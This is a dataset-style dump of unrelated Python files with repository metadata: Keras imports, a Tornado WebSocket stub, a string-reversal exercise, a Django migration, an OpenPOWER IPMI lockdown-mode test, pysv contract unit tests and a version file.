from compress_pickle import load as cload
import io
# Importations
import numpy as np
import pandas as pd
from time import time
import re
import os
import random
import time
# Deep learning
import tensorflow as tf
import keras
from keras.models import Sequential, Model, load_model
from keras.regularizers import l2
from keras.layers import Dense, Input, Flatten, Dropout, BatchNormalization, Activation
from keras.wrappers.scikit_learn import KerasClassifier
from keras.constraints import maxnorm
from keras.callbacks import ModelCheckpoint, EarlyStopping, LearningRateScheduler
from keras.utils.vis_utils import plot_model
from keras.utils import np_utils
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D, AveragePooling2D
from keras.layers.recurrent import LSTM, GRU
from keras.layers.wrappers import TimeDistributed
from keras.layers.merge import concatenate
from keras.optimizers import SGD, Adam
from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator
# Image Processing
from imutils import paths, build_montages
import imutils
import cv2
# Gridsearch
from sklearn.model_selection import GridSearchCV, KFold, train_test_split, cross_val_score
from keras.wrappers.scikit_learn import KerasClassifier, KerasRegressor
from sklearn.preprocessing import Normalizer, StandardScaler, MinMaxScaler, LabelBinarizer, MultiLabelBinarizer, LabelEncoder
from sklearn.utils import shuffle
from sklearn.pipeline import Pipeline
from sklearn.metrics import mean_squared_error, roc_auc_score, auc, confusion_matrix, accuracy_score, classification_report
# Visuals
import seaborn as sns
import matplotlib.pyplot as plt
# Plotting training class
from IPython.display import clear_output
# Visuals scripts
import sys
sys.path.append('..') # Parent folder
from drawer.keras_util import convert_drawer_model
from drawer.pptx_util import save_model_to_pptx
from drawer.matplotlib_util import save_model_to_file | 32.753623 | 125 | 0.834513 | 310 | 2,260 | 5.948387 | 0.480645 | 0.078091 | 0.048807 | 0.02603 | 0.075922 | 0.053145 | 0.053145 | 0 | 0 | 0 | 0 | 0.004518 | 0.118584 | 2,260 | 69 | 126 | 32.753623 | 0.921185 | 0.127434 | 0 | 0.042553 | 0 | 0 | 0.001022 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.978723 | 0 | 0.978723 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
d75d5e9c183dad29dd630cad94b9feb4b957bbfc | 535 | py | Python | examples/tornado/myapp/__init__.py | s-shin/wswrapper | f47500eb9d27d3aa96d91a50081945e3b83be9dd | [
"MIT"
] | 2 | 2017-05-15T22:23:36.000Z | 2018-02-19T12:27:45.000Z | examples/tornado/myapp/__init__.py | s-shin/wswrapper | f47500eb9d27d3aa96d91a50081945e3b83be9dd | [
"MIT"
] | null | null | null | examples/tornado/myapp/__init__.py | s-shin/wswrapper | f47500eb9d27d3aa96d91a50081945e3b83be9dd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
def setup_argparser(parser):
"""コマンドパーサーのセットアップ。
パーサーは共有されるので、被らないように上手く調整すること。
:param parser: ``argparse.ArgumentParser`` のインスタンス。
"""
pass
def setup_app(args):
"""コマンドパース後のセットアップ。
:param args: ``parser.arg_parse()`` の戻り値。
"""
pass
def on_open(client):
"""WebSocketのコネクションが成立した時に呼ばれる。
"""
pass
def on_close(client):
"""WebSocketのコネクションが切れた時に呼ばれる。
"""
pass
def on_setup(client, data):
client.emit("print", "Hello world!")
| 14.861111 | 55 | 0.605607 | 50 | 535 | 6.36 | 0.64 | 0.08805 | 0.084906 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002463 | 0.241122 | 535 | 35 | 56 | 15.285714 | 0.780788 | 0.46729 | 0 | 0.4 | 0 | 0 | 0.073276 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.4 | 0 | 0 | 0.5 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
d768dc679de8770bdc1267fbf48dedc2b6d9648d | 365 | py | Python | answers/Python/@oseme-techguy/03-word-in-reverse.py | Flipponachi/20-questions | a6ad9a468683646781426008e71dbb508e8e59bb | [
"MIT"
] | 1 | 2019-09-13T14:13:07.000Z | 2019-09-13T14:13:07.000Z | answers/Python/@oseme-techguy/03-word-in-reverse.py | Flipponachi/20-questions | a6ad9a468683646781426008e71dbb508e8e59bb | [
"MIT"
] | null | null | null | answers/Python/@oseme-techguy/03-word-in-reverse.py | Flipponachi/20-questions | a6ad9a468683646781426008e71dbb508e8e59bb | [
"MIT"
] | 1 | 2021-01-02T12:01:46.000Z | 2021-01-02T12:01:46.000Z | """
Solution to Word in Reverse
"""
if __name__ == '__main__':
while True:
word = input('Enter a word: ')
word = str(word)
i = len(word)
reversed_word = ''
while i > 0:
reversed_word += word[i - 1]
i -= 1
print('{reversed_word}\n'.format(reversed_word=reversed_word))
| 22.8125 | 71 | 0.493151 | 42 | 365 | 3.97619 | 0.52381 | 0.359281 | 0.191617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013216 | 0.378082 | 365 | 15 | 72 | 24.333333 | 0.722467 | 0.073973 | 0 | 0 | 0 | 0 | 0.125402 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.1 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d7761ae1988375a09b4acc44806bcabebad35bcd | 557 | py | Python | yoga/project/yoga/Database/migrations/0001_initial.py | sherlklee/yoga | fcfdfa2b326f20f2218b69fce6f881ff5d11d47b | [
"MIT"
] | null | null | null | yoga/project/yoga/Database/migrations/0001_initial.py | sherlklee/yoga | fcfdfa2b326f20f2218b69fce6f881ff5d11d47b | [
"MIT"
] | null | null | null | yoga/project/yoga/Database/migrations/0001_initial.py | sherlklee/yoga | fcfdfa2b326f20f2218b69fce6f881ff5d11d47b | [
"MIT"
] | 1 | 2019-06-04T01:53:52.000Z | 2019-06-04T01:53:52.000Z | # Generated by Django 2.2.1 on 2019-06-03 11:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Customer',
fields=[
('username', models.CharField(max_length=20, primary_key=True, serialize=False)),
('password', models.CharField(max_length=20)),
('identity', models.CharField(default='customer', max_length=12)),
],
),
]
| 24.217391 | 97 | 0.578097 | 56 | 557 | 5.678571 | 0.696429 | 0.141509 | 0.113208 | 0.150943 | 0.163522 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053708 | 0.298025 | 557 | 22 | 98 | 25.318182 | 0.759591 | 0.08079 | 0 | 0 | 1 | 0 | 0.078431 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.066667 | 0.066667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
d777be6f240c93857c87bee44f62377cde598f0d | 12,511 | py | Python | testcases/OpTestIPMILockMode.py | vaibhav92/op-test-framework | 792fa18d3f09fd8c28073074815ff96d373ab96d | [
"Apache-2.0"
] | null | null | null | testcases/OpTestIPMILockMode.py | vaibhav92/op-test-framework | 792fa18d3f09fd8c28073074815ff96d373ab96d | [
"Apache-2.0"
] | null | null | null | testcases/OpTestIPMILockMode.py | vaibhav92/op-test-framework | 792fa18d3f09fd8c28073074815ff96d373ab96d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
# IBM_PROLOG_BEGIN_TAG
# This is an automatically generated prolog.
#
# $Source: op-test-framework/testcases/OpTestIPMILockMode.py $
#
# OpenPOWER Automated Test Project
#
# Contributors Listed Below - COPYRIGHT 2015
# [+] International Business Machines Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# IBM_PROLOG_END_TAG
# @package OpTestIPMILockMode.py
# It will test in-band ipmi white-listed commands when ipmi is in locked mode
#
# IPMI whitelist
# These are the commands that will be available over an unauthenticated
# interface when the BMC is in IPMI lockdown mode.
# Generally one can access all in-band ipmi commands, But if we issue ipmi
# lock command then one can access only specific whitelisted in-band ipmi commands.
import time
import subprocess
import re, sys
from common.OpTestConstants import OpTestConstants as BMC_CONST
import unittest
import OpTestConfiguration
from common.OpTestUtil import OpTestUtil
from common.OpTestSystem import OpSystemState
class OpTestIPMILockMode(unittest.TestCase):
def setUp(self):
conf = OpTestConfiguration.conf
self.cv_HOST = conf.host()
self.cv_IPMI = conf.ipmi()
self.cv_SYSTEM = conf.system()
self.util = OpTestUtil()
self.platform = conf.platform()
##
# @brief This function will cover following test steps
# 1. It will get the OS level installed on power platform
# 2. It will check for kernel version installed on the Open Power Machine
# 3. It will check for ipmitool command existence and ipmitool package
# 4. Load the necessary ipmi modules based on config values
# 5. Issue a ipmi lock command through out-of-band authenticated interface
# 6. Now BMC IPMI is in locked mode, at this point only white listed
# in-band ipmi commands sholud work(No other in-band ipmi command should work)
# 7. Execute and test the functionality of whitelisted in-band ipmi
# commands in locked mode
# 8. At the end of test issue a ipmi unlock command to revert the availablity of all
# in-band ipmi commands in unlocked mode.
def runTest(self):
if not self.platform in ['habanero','firestone','garrison', 'p9dsu']:
raise unittest.SkipTest("Platform %s doesn't support IPMI Lockdown mode" % self.platform)
self.cv_SYSTEM.goto_state(OpSystemState.OS)
# Get OS level
l_oslevel = self.cv_HOST.host_get_OS_Level()
# Get kernel version
l_kernel = self.cv_HOST.host_get_kernel_version()
# Checking for ipmitool command and lm_sensors package
self.cv_HOST.host_check_command("ipmitool")
l_pkg = self.cv_HOST.host_check_pkg_for_utility(l_oslevel, "ipmitool")
print "Installed package: %s" % l_pkg
# loading below ipmi modules based on config option
# ipmi_devintf, ipmi_powernv and ipmi_masghandler
self.cv_HOST.host_load_module_based_on_config(l_kernel, BMC_CONST.CONFIG_IPMI_DEVICE_INTERFACE,
BMC_CONST.IPMI_DEV_INTF)
self.cv_HOST.host_load_module_based_on_config(l_kernel, BMC_CONST.CONFIG_IPMI_POWERNV,
BMC_CONST.IPMI_POWERNV)
self.cv_HOST.host_load_module_based_on_config(l_kernel, BMC_CONST.CONFIG_IPMI_HANDLER,
BMC_CONST.IPMI_MSG_HANDLER)
# Issue a ipmi lock command through authenticated interface
print "Issuing ipmi lock command through authenticated interface"
l_res = self.cv_IPMI.enter_ipmi_lockdown_mode()
try:
self.run_inband_ipmi_whitelisted_cmds()
except:
l_msg = "One of white listed in-band ipmi command execution failed"
print sys.exc_info()
finally:
# Issue a ipmi unlock command at the end of test.
print "Issuing ipmi unlock command through authenticated interface"
self.cv_IPMI.exit_ipmi_lockdown_mode()
##
# @brief This function will execute whitelisted in-band ipmi commands
# and test the functionality in locked mode.
def run_inband_ipmi_whitelisted_cmds(self):
l_con = self.cv_SYSTEM.sys_get_ipmi_console()
self.cv_SYSTEM.host_console_login()
self.cv_SYSTEM.host_console_unique_prompt()
l_con.run_command("uname -a")
# Test IPMI white listed commands those should be allowed through un-authenticated
# in-band interface
# 1.[App] Get Device ID
print "Testing Get Device ID command"
l_res = l_con.run_command(BMC_CONST.HOST_GET_DEVICE_ID)
# 2.[App] Get Device GUID
print "Testing Get Device GUID"
l_res = l_con.run_command(BMC_CONST.HOST_GET_DEVICE_GUID)
# 3.[App] Get System GUID
print "Testing Get system GUID"
l_res = l_con.run_command(BMC_CONST.HOST_GET_SYSTEM_GUID)
# 4.[Storage] Get SEL info
print "Testing Get SEL info"
l_res = l_con.run_command(BMC_CONST.HOST_GET_SEL_INFO)
# 5.[Storage] Get SEL time
print "Testing Get SEL time"
l_res = l_con.run_command(BMC_CONST.HOST_GET_SEL_TIME_RAW)
# 6. [Storage] Reserve SEL
print "Testing Reserve SEL"
l_res = l_con.run_command(BMC_CONST.HOST_RESERVE_SEL)
# 7. [Storage] Set SEL time (required for RTC)
print "Testing Set SEL time"
l_res = l_con.run_command(BMC_CONST.HOST_GET_SEL_TIME)
l_res = l_con.run_command(BMC_CONST.HOST_SET_SEL_TIME + " \'" + l_res[-1] + "\'")
l_con.run_command(BMC_CONST.HOST_GET_SEL_TIME)
# 8. [Transport] Get LAN parameters
print "Testing Get LAN parameters"
l_res = l_con.run_command(BMC_CONST.HOST_GET_LAN_PARAMETERS)
# 9.[Chassis] Get System Boot Options
print "Testing Get System Boot Options"
l_res = l_con.run_command(BMC_CONST.HOST_GET_SYSTEM_BOOT_OPTIONS)
# 10.[Chassis] Set System Boot Options
print "Testing Set System Boot Options"
l_res = l_con.run_command(BMC_CONST.HOST_SET_SYTEM_BOOT_OPTIONS)
l_con.run_command(BMC_CONST.HOST_GET_SYSTEM_BOOT_OPTIONS)
# 11. [App] Get BMC Global Enables
print "Testing Get BMC Global Enables"
l_res = l_con.run_command(BMC_CONST.HOST_GET_BMC_GLOBAL_ENABLES_RAW)
l_con.run_command(BMC_CONST.HOST_GET_BMC_GLOBAL_ENABLES)
# 12. [App] Set BMC Global Enables
print "Testing Set BMC Global Enables"
l_res = l_con.run_command(BMC_CONST.HOST_SET_BMC_GLOBAL_ENABLES_SEL_OFF)
l_con.run_command(BMC_CONST.HOST_GET_BMC_GLOBAL_ENABLES)
l_con.run_command(BMC_CONST.HOST_SET_BMC_GLOBAL_ENABLES_SEL_ON)
# 13.[App] Get System Interface Capabilities
if not self.platform in ['p9dsu']:
print "Testing Get System Interface Capabilities"
l_res = l_con.run_command(BMC_CONST.HOST_GET_SYSTEM_INTERFACE_CAPABILITIES_SSIF)
l_res = l_con.run_command(BMC_CONST.HOST_GET_SYSTEM_INTERFACE_CAPABILITIES_KCS)
# 14.[App] Get Message Flags
print "Testing Get Message Flags"
l_res = l_con.run_command(BMC_CONST.HOST_GET_MESSAGE_FLAGS)
# 15. [App] Get BT Capabilities
print "Testing Get BT Capabilities"
l_res = l_con.run_command(BMC_CONST.HOST_GET_BT_CAPABILITIES)
# 16. [App] Clear Message Flags
print "Testing Clear Message Flags"
l_res = l_con.run_command_ignore_fail(BMC_CONST.HOST_CLEAR_MESSAGE_FLAGS)
if not self.platform in ['p9dsu']:
# 17. [OEM] PNOR Access Status
print "Testing the PNOR Access Status"
l_res = l_con.run_command(BMC_CONST.HOST_PNOR_ACCESS_STATUS_DENY)
l_res = l_con.run_command(BMC_CONST.HOST_PNOR_ACCESS_STATUS_GRANT)
# 18. [Storage] Add SEL Entry
print "Testing Add SEL Entry"
print "Clearing the SEL list"
self.cv_IPMI.ipmi_sdr_clear()
l_res = l_con.run_command(BMC_CONST.HOST_ADD_SEL_ENTRY)
time.sleep(1)
l_res = self.cv_IPMI.last_sel()
print "Checking for Reserved entry creation in SEL"
print l_res
if "eserved" not in l_res:
raise Exception("IPMI: Add SEL Entry command, doesn't create an SEL event")
# 19. [App] Set Power State
print "Testing Set Power State"
l_res = l_con.run_command(BMC_CONST.HOST_SET_ACPI_POWER_STATE)
# 20.[Sensor/Event] Platform Event (0x02)
print "Testing Platform Event"
self.cv_IPMI.ipmi_sdr_clear()
l_res = l_con.run_command(BMC_CONST.HOST_PLATFORM_EVENT)
l_res = self.cv_IPMI.last_sel()
if "eserved" not in l_res:
raise Exception("IPMI: Platform Event command failed to log SEL event")
# 21.[Chassis] Chassis Control
print "Testing chassis power on"
l_res = l_con.run_command(BMC_CONST.HOST_CHASSIS_POWER_ON)
# 22. [App] Get ACPI Power State (0x06)
print "Testing Get ACPI Power State"
l_res = l_con.run_command(BMC_CONST.HOST_GET_ACPI_POWER_STATE)
# 23. [App] Set watchdog
print "Testing Set watchdog"
l_res = l_con.run_command(BMC_CONST.HOST_SET_WATCHDOG)
self.cv_IPMI.mc_get_watchdog()
if self.platform in ['p9dsu']:
return
# 24. [Sensor/Event] Get Sensor Type
print "Testing Get Sensor Type"
l_res = self.cv_IPMI.sdr_get_watchdog()
matchObj = re.search( "Watchdog \((0x\d{1,})\)", l_res)
if matchObj:
print "Got sensor Id for watchdog: %s" % matchObj.group(1)
else:
raise Exception("Failed to get sensor id for watchdog sensor")
l_res = l_con.run_command(BMC_CONST.HOST_GET_SENSOR_TYPE_FOR_WATCHDOG + " " + matchObj.group(1))
# 25.[Sensor/Event] Get Sensor Reading
print "Testing Get Sensor Reading"
l_res = self.cv_IPMI.sdr_get_watchdog()
matchObj = re.search( "Watchdog \((0x\d{1,})\)", l_res)
if matchObj:
print "Got sensor Id for watchdog: %s" % matchObj.group(1)
else:
raise Exception("Failed to get sensor id for watchdog sensor")
l_res = l_con.run_command(BMC_CONST.HOST_GET_SENSOR_READING + " " + matchObj.group(1))
# 26. [OEM] PNOR Access Response (0x08)
print "Testing PNOR Access Response"
l_con.run_command(BMC_CONST.HOST_PNOR_ACCESS_STATUS_GRANT)
l_res = l_con.run_command(BMC_CONST.HOST_PNOR_ACCESS_RESPONSE)
l_con.run_command(BMC_CONST.HOST_PNOR_ACCESS_STATUS_DENY)
l_res = l_con.run_command(BMC_CONST.HOST_PNOR_ACCESS_RESPONSE)
# 27.[App] 0x38 Get Channel Authentication Cap
print "Testing Get Channel Authentication Capabilities"
l_res = l_con.run_command(BMC_CONST.HOST_GET_CHANNEL_AUTH_CAP)
# 28.[App] Reset Watchdog (0x22)
print "Testing reset watchdog"
self.cv_IPMI.ipmi_sdr_clear()
l_res = l_con.run_command(BMC_CONST.HOST_RESET_WATCHDOG)
l_res = ''
for x in range(0,25):
# Reset watchdog should create a SEL event log
print "# Looking for Watchdog SEL event try %d" % x
l_res = self.cv_IPMI.last_sel()
print l_res
if "Watchdog" in l_res:
break
time.sleep(1)
if "Watchdog" not in l_res:
raise Exception("IPMI: Reset Watchdog command, doesn't create an SEL event")
# Below commands will effect sensors and fru values and some care to be taken for
# executing.
# 29.[Storage] Write FRU
# 30.[Sensor/Event] Set Sensor Reading
# 31. [OEM] Partial Add ESEL (0xF0)
# This is testsed by kernel itself, it will send messages to BMC internally
# 32.[App] Send Message
| 41.842809 | 104 | 0.671809 | 1,782 | 12,511 | 4.470258 | 0.204826 | 0.024102 | 0.035149 | 0.070299 | 0.429199 | 0.342707 | 0.321366 | 0.308059 | 0.296259 | 0.279689 | 0 | 0.011495 | 0.256015 | 12,511 | 298 | 105 | 41.983221 | 0.844327 | 0.300216 | 0 | 0.196078 | 1 | 0 | 0.178081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.052288 | null | null | 0.254902 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d78d46855b1e8af013795bcd9ce42f63ccd57ab7 | 7,716 | py | Python | tests/test_contract.py | iwob/pysv | 6fdfb93d66cce84cceacabd3806f3f51f0cbbe17 | [
"MIT"
] | 2 | 2017-06-21T04:00:11.000Z | 2018-06-11T17:28:55.000Z | tests/test_contract.py | iwob/pysv | 6fdfb93d66cce84cceacabd3806f3f51f0cbbe17 | [
"MIT"
] | null | null | null | tests/test_contract.py | iwob/pysv | 6fdfb93d66cce84cceacabd3806f3f51f0cbbe17 | [
"MIT"
] | 1 | 2018-06-11T17:28:56.000Z | 2018-06-11T17:28:56.000Z | import unittest
from pysv.contract import *
class TestsContract(unittest.TestCase):
def test_program_vars_input_and_local(self):
vars = ProgramVars({'x': 'Int'}, {'y': 'Int'})
vars.add_marked_variables(["|x|'", "|y|'", "|y|''"])
self.assertEquals({'x': 'Int', "|x|'": 'Int'}, vars.input_vars)
self.assertEquals({'y': 'Int', "|y|'": 'Int', "|y|''": 'Int'}, vars.local_vars)
self.assertEquals({'x', "|x|'"}, set(vars.get_names_input()))
self.assertEquals({'y', "|y|'", "|y|''"}, set(vars.get_names_local()))
self.assertEquals({'x', "|x|'", 'y', "|y|'", "|y|''"}, set(vars.get_names_all()))
self.assertEquals({'x': 'Int', "|x|'": 'Int', 'y': 'Int', "|y|'": 'Int', "|y|''": 'Int'}, vars.all())
vars.add_input_variables(['a', 'b'], 'Bool')
self.assertEquals({'x': 'Int', "|x|'": 'Int', 'a': 'Bool', 'b': 'Bool'}, vars.input_vars)
vars.add_local_variables(['c'], 'Bool')
self.assertEquals({'y': 'Int', "|y|'": 'Int', "|y|''": 'Int', 'c': 'Bool'}, vars.local_vars)
vars.rename_var('c', 'c_T1')
self.assertEquals({'y': 'Int', "|y|'": 'Int', "|y|''": 'Int', 'c_T1': 'Bool'}, vars.local_vars)
def test_program_vars_markers(self):
vars = ProgramVars({'x':'Int'}, {"y":"Int", "|y''|":"Int", "|asd'''''|":"Double", "|y'|":"Int"})
self.assertEquals("|y''|", vars.get_latest_var_name('y'))
def test_formula_test_case_border_cases(self):
self.assertRaises(Exception, formula_test_case_py, [], [])
self.assertRaises(Exception, formula_test_case_py, ['A'], [])
self.assertRaises(Exception, formula_test_case_py, [], ['B'])
def test_formula_test_case(self):
formula = formula_test_case_py(['A'], ['C'])
expected = "((not (A)) or (C))"
self.assertEquals(expected, formula)
formula = formula_test_case_py(['A', 'B'], ['C', 'D'])
expected = "(((not (A)) or (not (B))) or ((C) and (D)))"
self.assertEquals(expected, formula)
def test_formula_test_cases_1(self):
p1 = (['x>0'], ['res==5 and y<0'])
formula = formula_test_cases_py([p1])
expected = "((not (x>0)) or (res==5 and y<0))"
self.assertEquals(expected, formula)
def test_formula_test_cases_2(self):
p1 = (['A', 'B'], ['x == 8', 'y == 0'])
p2 = (['A', 'C'], ['x == 5', 'y == 1'])
p3 = (['D', 'B'], ['x == 8', 'y == 2'])
formula = formula_test_cases_py([p1, p2, p3])
expected = "(((not (A)) or (not (B))) or ((x == 8) and (y == 0))) and (((not (A)) or (not (C))) or ((x == 5) and (y == 1))) and (((not (D)) or (not (B))) or ((x == 8) and (y == 2)))"
self.assertEquals(expected, formula)
def test_program_vars_static_methods(self):
vars = {'x': 'Int', 'y': 'Int', 'z': 'Bool', 'a': 'Real'}
self.assertEquals({'Int', 'Bool', 'Real'}, ProgramVars.get_types(vars))
self.assertEquals({'x': 'Int', 'y': 'Int'}, ProgramVars.get_vars_of_type(vars, 'Int'))
self.assertEquals({'z': 'Bool'}, ProgramVars.get_vars_of_type(vars, 'Bool'))
self.assertEquals({'a': 'Real'}, ProgramVars.get_vars_of_type(vars, 'Real'))
self.assertEquals({}, ProgramVars.get_vars_of_type(vars, 'String'))
def test_Test_class(self):
test = Test([1, 2], [3, -1], ['x', 'y'], ['add', 'sub'])
self.assertEquals([1, 2], test.inputs)
self.assertEquals([3, -1], test.outputs)
self.assertEquals("(x == 1) and (y == 2)", test.code_inputs(lang=utils.LANG_PYTHON))
self.assertEquals("(add == 3) and (sub == -1)", test.code_outputs(lang=utils.LANG_PYTHON))
self.assertEquals("(and (= x 1) (= y 2))", test.code_inputs(lang=utils.LANG_SMT2))
self.assertEquals("(and (= add 3) (= sub -1))", test.code_outputs(lang=utils.LANG_SMT2))
def test_Test_formulaic_form_py(self):
t = Test([1, 2], [3, -1], ['x', 'y'], ['add', 'sub'])
self.assertEquals(['x == 1', 'y == 2'], Test.formulaic_form(t.inputs, t.in_vars, lang=utils.LANG_PYTHON))
self.assertEquals(['add == 3', 'sub == -1'], Test.formulaic_form(t.outputs, t.out_vars, lang=utils.LANG_PYTHON))
self.assertEquals(['(= x 1)', '(= y 2)'], Test.formulaic_form(t.inputs, t.in_vars, lang=utils.LANG_SMT2))
self.assertEquals(['(= add 3)', '(= sub -1)'], Test.formulaic_form(t.outputs, t.out_vars, lang=utils.LANG_SMT2))
def test_TestF_class(self):
t = TestF([1, 2], ['add < sub', 'sub >= 0'], ['x', 'y'], ['add', 'sub'])
self.assertEquals([1, 2], t.inputs)
self.assertEquals(['add < sub', 'sub >= 0'], t.outputs)
self.assertEquals("(x == 1) and (y == 2)", t.code_inputs(lang=utils.LANG_PYTHON))
self.assertEquals("(add < sub) and (sub >= 0)", t.code_outputs(lang=utils.LANG_PYTHON))
self.assertEquals("(and (= x 1) (= y 2))", t.code_inputs(lang=utils.LANG_SMT2))
self.assertEquals("(and add < sub sub >= 0)", t.code_outputs(lang=utils.LANG_SMT2))
def test_TestFF_class(self):
t = TestFF(['x == 1', 'y == 2'], ['add < sub', 'sub >= 0'], ['x', 'y'], ['add', 'sub'])
self.assertEquals(['x == 1', 'y == 2'], t.inputs)
self.assertEquals(['add < sub', 'sub >= 0'], t.outputs)
self.assertEquals("(x == 1) and (y == 2)", t.code_inputs(lang=utils.LANG_PYTHON))
self.assertEquals("(add < sub) and (sub >= 0)", t.code_outputs(lang=utils.LANG_PYTHON))
self.assertEquals("(and x == 1 y == 2)", t.code_inputs(lang=utils.LANG_SMT2))
self.assertEquals("(and add < sub sub >= 0)", t.code_outputs(lang=utils.LANG_SMT2))
def test_TestCases_class_py(self):
tests = [Test([0, 2], [2]),
Test([1, 2], [3]),
Test([1, 3], [4])]
tc = TestCases(tests, in_vars=['x', 'y'], out_vars=['res'], lang=utils.LANG_PYTHON)
self.assertEquals([0, 2], tc.tests[0].inputs)
self.assertEquals([1, 2], tc.tests[1].inputs)
self.assertEquals([2], tc.tests[0].outputs)
self.assertEquals([3], tc.tests[1].outputs)
self.assertEquals('(not ((x == 0) and (y == 2)) or (res == 2)) and ' +\
'(not ((x == 1) and (y == 2)) or (res == 3)) and ' +\
'(not ((x == 1) and (y == 3)) or (res == 4))',
tc.code_postcond())
tests = [TestFF(['A', 'B'], ['C'])]
tc = TestCases(tests, in_vars=['x', 'y'], out_vars=['res'], lang=utils.LANG_PYTHON)
self.assertEquals('(not ((A) and (B)) or (C))',
tc.code_postcond())
tests = []
tc = TestCases(tests, in_vars=['x', 'y'], out_vars=['res'], lang=utils.LANG_PYTHON)
self.assertEquals('', tc.code_postcond())
def test_TestCases_class_smt2(self):
tests = [Test([0, 2], [2]),
Test([1, 2], [3]),
Test([1, 3], [4])]
test_cases = TestCases(tests, in_vars=['x', 'y'], out_vars=['res'], lang=utils.LANG_SMT2)
self.assertEquals('(and (=> (and (= x 0) (= y 2)) (= res 2)) ' +\
'(=> (and (= x 1) (= y 2)) (= res 3)) ' +\
'(=> (and (= x 1) (= y 3)) (= res 4))' +\
')',
test_cases.code_postcond())
tests = [TestFF(['A', 'B'], ['C'])]
tc = TestCases(tests, in_vars=['x', 'y'], out_vars=['res'], lang=utils.LANG_SMT2)
self.assertEquals('(=> (and A B) C)',
tc.code_postcond())
tests = []
tc = TestCases(tests, in_vars=['x', 'y'], out_vars=['res'], lang=utils.LANG_SMT2)
self.assertEquals('', tc.code_postcond()) | 49.780645 | 194 | 0.525531 | 1,045 | 7,716 | 3.724402 | 0.085167 | 0.209661 | 0.073484 | 0.0537 | 0.699897 | 0.670349 | 0.57554 | 0.505139 | 0.465313 | 0.410329 | 0 | 0.023737 | 0.235614 | 7,716 | 155 | 195 | 49.780645 | 0.636148 | 0 | 0 | 0.271186 | 0 | 0.008475 | 0.186212 | 0 | 0 | 0 | 0 | 0 | 0.457627 | 1 | 0.110169 | false | 0 | 0.016949 | 0 | 0.135593 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ad0e9389830044b275eaeda53fb94fe0bd3d6df6 | 55 | py | Python | egtaonline/__init__.py | egtaonline/egtaonline-api | a450aad43f5828ab1bc74def7237018b2de9647e | [
"Apache-2.0"
] | null | null | null | egtaonline/__init__.py | egtaonline/egtaonline-api | a450aad43f5828ab1bc74def7237018b2de9647e | [
"Apache-2.0"
] | null | null | null | egtaonline/__init__.py | egtaonline/egtaonline-api | a450aad43f5828ab1bc74def7237018b2de9647e | [
"Apache-2.0"
] | 1 | 2019-03-09T11:45:55.000Z | 2019-03-09T11:45:55.000Z | """Module for egta online api"""
__version__ = '0.8.7'
